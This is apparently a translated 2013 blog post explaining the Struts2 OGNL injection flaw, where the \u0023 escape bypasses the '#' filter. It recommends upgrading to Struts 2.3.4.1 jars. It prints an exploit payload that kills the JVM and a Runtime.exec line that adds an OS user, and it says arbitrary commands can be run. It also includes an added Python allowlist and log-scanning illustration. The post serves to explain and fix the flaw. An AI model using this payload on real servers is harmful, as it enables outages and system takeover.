Thursday, August 1, 2013

Struts2 vulnerability: principle and solution


1. Principle


The core of Struts2 is the WebWork framework. At the bottom, an action handles HTTP parameters by calling getter/setter methods: each HTTP parameter is treated as an OGNL (Object-Graph Navigation Language) statement. When we submit the HTTP parameters


?user.address.city=Bishkek&user['favoriteDrink']=kumys
OGNL converts them to:
action.getUser().getAddress().setCity("Bishkek");
action.getUser().setFavoriteDrink("kumys");


This is carried out by the ParametersInterceptor (the parameter interceptor), which calls ValueStack.setValue() with the user-supplied HTTP parameters.


To prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in parameter names. But if the Java Unicode escape \u0023 is used in its place, an attacker can bypass the protection and modify the values it was meant to protect:

The following code is destructive. Please run it only in a test environment; using this method for malicious attacks is strictly prohibited.
? ('\ u0023_memberAccess [\' allowStaticMethodAccess \ ']') (meh) = true & (aaa) (('\ u0023context [\' xwork.MethodAccessor.denyMethodExecution \ '] \ u003d \ u0023foo') (\ u0023foo \ u003dnew% 20java.lang.Boolean ("false"))) & (asdf ) (('\ u0023rt.exit (1)') (\ u0023rt \ u003d@java.lang.Runtime @ getRuntime ())) = 1

Unescaped, it reads:


? ('# _memberAccess [' allowStaticMethodAccess ']') (meh) = true & (aaa) (('# context [' xwork.MethodAccessor.denyMethodExecution '] = # foo') (# foo = new% 20java . lang.Boolean ("false"))) & (asdf) (('# rt.exit (1)') (# rt = @ java.lang.Runtime @ getRuntime ())) = 1

The end result of the OGNL processing is:


java.lang.Runtime.getRuntime().exit(1); // terminates the JVM, which shuts down the web application


Similarly, it can run:
java.lang.Runtime.getRuntime().exec("net user username password /add"); // adds an operating-system user if the call succeeds (in the URL, %20 replaces spaces and %2F replaces /)
With sufficient privileges, any DOS command can be run this way.
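As an added illustration that is not the original post's code, this Python model contrasts the check described above, a denylist on '#' which the \u0023 escape slips past, with an allowlist that decodes the escape before checking the name, in the spirit of the accepted-name pattern that later Struts2 ParametersInterceptor versions apply; it then scans two constructed access-log lines for names that fail the allowlist. The regex, function names and log lines are assumptions.

```python
import re
from urllib.parse import parse_qsl

def denylist_allows(name: str) -> bool:
    """The check this post describes: reject any parameter name containing '#'.
    It inspects the raw text only, so the Java escape \\u0023 is not caught."""
    return "#" not in name

def java_unescape(s: str) -> str:
    """Decode Java/OGNL \\uXXXX escapes the way the expression evaluator would."""
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), s)

# Assumed allowlist: only the characters property navigation needs, so '#',
# '(', ')', '@', '=' and '\' can never reach the evaluator.
ACCEPTED_NAME = re.compile(r"[A-Za-z0-9_.\[\]']+")

def allowlist_allows(name: str) -> bool:
    """Hardened check: normalise the name to what the evaluator would see,
    then accept it only if every character is on the allowlist."""
    return ACCEPTED_NAME.fullmatch(java_unescape(name)) is not None

def suspicious_params(request_line: str) -> list:
    """Parameter names in an access-log request line that fail the allowlist."""
    if "?" not in request_line:
        return []
    query = request_line.split("?", 1)[1].split(" ", 1)[0]
    names = [n for n, _ in parse_qsl(query, keep_blank_values=True)]
    return [n for n in names if not allowlist_allows(n)]

# Constructed access-log request lines: the benign request from this post and
# one whose parameter name carries the \u0023-escaped '#' the post describes.
SAMPLE_REQUESTS = [
    "GET /profile.action?user.address.city=Bishkek&user[%27favoriteDrink%27]=kumys HTTP/1.1",
    "GET /profile.action?(%27\\u0023_memberAccess[%27allowStaticMethodAccess%27]%27)(meh)=true HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        for name in suspicious_params(line):
            # The denylist answer shows why the raw-text check alone is not enough.
            print("denylist passes: %s | flagged: %s" % (denylist_allows(name), name))
```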


2. Solution
Many online articles describe three solutions. Personally, I feel that updating the Struts2 jar packages to the latest version is the simplest, since no program code needs to change; the latest version at present is 2.3.4.
The downloaded update package contains many jars; in my system I mainly used the following to replace the old versions:
commons-lang3-3.1.jar (keep commons-lang-2.6.jar as well)
javassist-3.11.0.GA.jar (newly added package)
ognl-3.0.5.jar (replaces the old version)
struts2-core-2.3.4.1.jar (replaces the old version)
xwork-core-2.3.4.1.jar (replaces the old version)

